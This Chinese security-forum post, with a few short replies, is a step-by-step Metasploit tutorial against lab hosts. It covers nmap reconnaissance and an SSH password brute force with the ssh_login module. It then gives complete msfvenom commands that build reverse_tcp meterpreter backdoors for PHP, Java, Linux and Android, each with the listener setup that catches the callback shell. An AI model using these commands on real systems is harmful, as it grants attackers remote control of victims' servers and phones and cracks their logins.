首页
论坛
专栏
课程

[原创]Metasploit后门以及跨平台后门生成

2019-10-12 09:52 1913

[原创]Metasploit后门以及跨平台后门生成

2019-10-12 09:52
1913

Metasploit后门以及跨平台后门生成

目录

1.Metasploit对目标主机SSH爆破

1.实验原理:靶机root用户存在弱口令漏洞,利用枚举的方法破解目标主机ssh服务

1.1爆破过程

1.验证局域网内部存活主机:nmap -sP 192.168.73.0/24;得到靶机IP

 

2.扫描靶机的操作系统:nmap -O 192.168.73.128;得到靶机的操作系统及版本号

 

3.扫描靶机的端口开放及应用程序的版本号:nmap -sV -Pn 192.168.73.128;发现22端口开放,其应用程序为ssh

 

4.打开Metasploit工具,利用msf ssh_login模块暴力破解靶机ssh密码:use auxiliary/scanner/ssh/ssh_login;进入模块show options配置

 

5.建立用户名字典及密码字典(为了减少爆破时间,用户名及密码设置特定的几个即可)

  • user.txtpass.txt文件放到kali linux指定目录下

6.准备进行ssh爆破:设置用户名字典和密码字典的路径;设置靶机的IP地址;设置线程为50;开始执行

  • exploit之后,没有显示;将VERBOSE设置为true即可

7.等待ssh爆破执行完毕

 

8.开始链接

2.PHP后门生成

1.示例指令:

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.73.131 -f raw >/root/test.php

  • LHOST:攻击者IP
  • PHP后门代码

2.配置Metasploitexploit监听

search exploit/hanler  // (exploit/multi/handler:通用有效负载处理程序)
use exploit/multi/handler        // 使用模块
show options         // 配置
set LHOST 192.168.73.131
set payload php/meterpreter/reverse_tcp         // 设置测试的载荷
exploit            // 监听

  • php后门使用

3.JAVA后门生成

1.示例指令

msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.73.131 -o /root/Desktop/test.jar

 

2.配置Metasploitexploit监听

search exploit/hanler  // (exploit/multi/handler:通用有效负载处理程序)
use exploit/multi/handler        // 使用模块
show options         // 配置
set LHOST 192.168.73.131
set payload java/meterpreter/reverse_tcp         // 设置测试的载荷
exploit            // 监听

  • java后门使用

4.LINUX后门生成

1.示例指令:

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.73.131 LPORT=4444 -f elf > root/Desktop/shell

 

2.配置Metasploitexploit监听

search exploit/hanler  // (exploit/multi/handler:通用有效负载处理程序)
use exploit/multi/handler        // 使用模块
show options         // 配置
set LHOST 192.168.73.131
set payload linux/x86/meterpreter/reverse_tcp         // 设置测试的载荷
exploit            // 监听

  • linux后门使用

5.Android后门生成

1.示例指令:

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.73.131 LPORT=5555 R > /root/Linux/backdoor.apk

 

2.配置Metasploitexploit监听

search exploit/hanler  // (exploit/multi/handler:通用有效负载处理程序)
use exploit/multi/handler        // 使用模块
show options         // 配置
set LHOST 192.168.73.131
set LPORT 5555
set payload android/meterpreter/reverse_tcp         // 设置测试的载荷
exploit            // 监听

☛参考文档

☛2019-08-28 14:27:50 星期三



2020安全开发者峰会(2020 SDC)议题征集 中国.北京 7月!

最后于 2019-10-12 09:54 被Lǎn māo编辑 ,原因:
最新回复 (7)
Editor 2019-10-12 10:01
2
0
感谢分享哦~
Hades一KXXY 2019-10-12 10:13
3
0
发错区了吧,应该发到WEB吧,不过这东西网上类似的帖子一大把。
Lǎn māo 2019-10-12 10:18
4
0
Hades一KXXY 发错区了吧,应该发到WEB吧,不过这东西网上类似的帖子一大把。
嗷嚎 只是突然想能不能拐点雪币  
killpy 2 2019-10-12 16:05
5
0
mark
mb_jrbhkper 2019-10-17 19:38
6
0
此楼层已删除
LOVEZ 2019-10-22 10:44
7
0
mark
epson12332 2019-10-23 19:56
8
0
謝謝分享
游客
登录 | 注册 方可回帖
返回